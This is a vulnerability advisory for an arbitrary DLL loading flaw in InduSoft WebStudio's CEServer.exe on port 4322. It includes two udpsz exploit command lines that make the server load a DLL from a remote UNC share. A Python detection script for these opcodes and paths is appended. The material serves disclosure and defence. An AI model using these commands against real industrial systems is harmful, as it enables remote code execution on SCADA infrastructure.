#######################################################################

                             Luigi Auriemma

Application:  InduSoft WebStudio
              http://www.indusoft.com
Versions:     <= 7.0 (Oct 2010)
Platforms:    Windows
Bug:          arbitrary dll loading in CEServer.exe
Exploitation: remote, versus server
Date:         probably found 15 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"InduSoft is HMI SCADA software for developing applications in
industrial, Instrumentation and Embedded Systems"

#######################################################################

======
2) Bug
======

CEServer.exe is the remote agent server running on port 4322 and
"Studio Manager.exe" is the main server component.

The protocol is constituted by an 8-bit opcode (from 0x01 to 0x39)
followed by the data.

The opcode 0x31 is followed by a string containing the name of the DLL
that will be loaded in real-time by Studio Manager, so an attacker can
execute remote code by providing the name of a custom dll residing on
his shared folder or alternatively on a local disk created through the
directory traversal vulnerabilities of the other advisories.

Note that it doesn't matter if Studio Manager is running or not because
it can be started remotely through the opcode 0x07.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -C 07 -T SERVER 4322 -1
  udpsz -c "1\\\\myhost\\myshare\\name_of_the_dll_to_load_without_DLL_extension\0" -T SERVER 4322 -1

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-330/

#######################################################################
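The message layout given in section 2 (one opcode byte, then the data) is simple enough to inspect on the wire, so a monitoring sensor in front of port 4322 can flag the two opcodes the advisory describes before the ZDI fix is deployed. The inspector below is an added example and is not part of Auriemma's advisory or the udpsz tool; the sample datagrams are constructed, and the severity labels and the `Finding` structure are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

CESERVER_PORT = 4322                 # port named in the advisory
OPCODE_START_STUDIO_MANAGER = 0x07   # remotely starts Studio Manager
OPCODE_LOAD_DLL = 0x31               # followed by a NUL-terminated DLL name
OPCODE_MIN, OPCODE_MAX = 0x01, 0x39  # documented opcode range

@dataclass
class Finding:
    opcode: int
    severity: str
    reason: str
    dll_name: Optional[str] = None

def parse_message(payload: bytes) -> Optional[Tuple[int, bytes]]:
    """Split a CEServer datagram into (opcode, data); None if empty."""
    if not payload:
        return None
    return payload[0], payload[1:]

def inspect_message(payload: bytes) -> Optional[Finding]:
    """Return a Finding for messages worth alerting on, else None."""
    parsed = parse_message(payload)
    if parsed is None:
        return None
    opcode, data = parsed
    if not OPCODE_MIN <= opcode <= OPCODE_MAX:
        return Finding(opcode, "low", "opcode outside documented 0x01-0x39 range")
    if opcode == OPCODE_START_STUDIO_MANAGER:
        return Finding(opcode, "medium", "remote start of Studio Manager requested")
    if opcode == OPCODE_LOAD_DLL:
        # The DLL name is the string up to the first NUL (no extension).
        name = data.split(b"\0", 1)[0].decode("latin-1")
        if name.startswith("\\\\") or name.startswith("//"):
            return Finding(opcode, "high", "DLL load from UNC share", name)
        if re.search(r"(^|[\\/])\.\.([\\/]|$)", name):
            return Finding(opcode, "high", "DLL load via directory traversal", name)
        if re.match(r"[A-Za-z]:[\\/]", name):
            return Finding(opcode, "high", "DLL load from absolute path", name)
        return Finding(opcode, "medium", "DLL load request", name)
    return None

# Constructed sample datagrams (not captured traffic).
SAMPLES = {
    "start":   b"\x07",
    "unc":     b"\x31\\\\host\\share\\mod\0",
    "trav":    b"\x31..\\..\\temp\\mod\0",
    "benign":  b"\x31SomeModule\0",
    "other":   b"\x12\x00\x01",
}

def scan(samples=SAMPLES):
    """Inspect every sample; alerts are the non-None values."""
    return {label: inspect_message(raw) for label, raw in samples.items()}
```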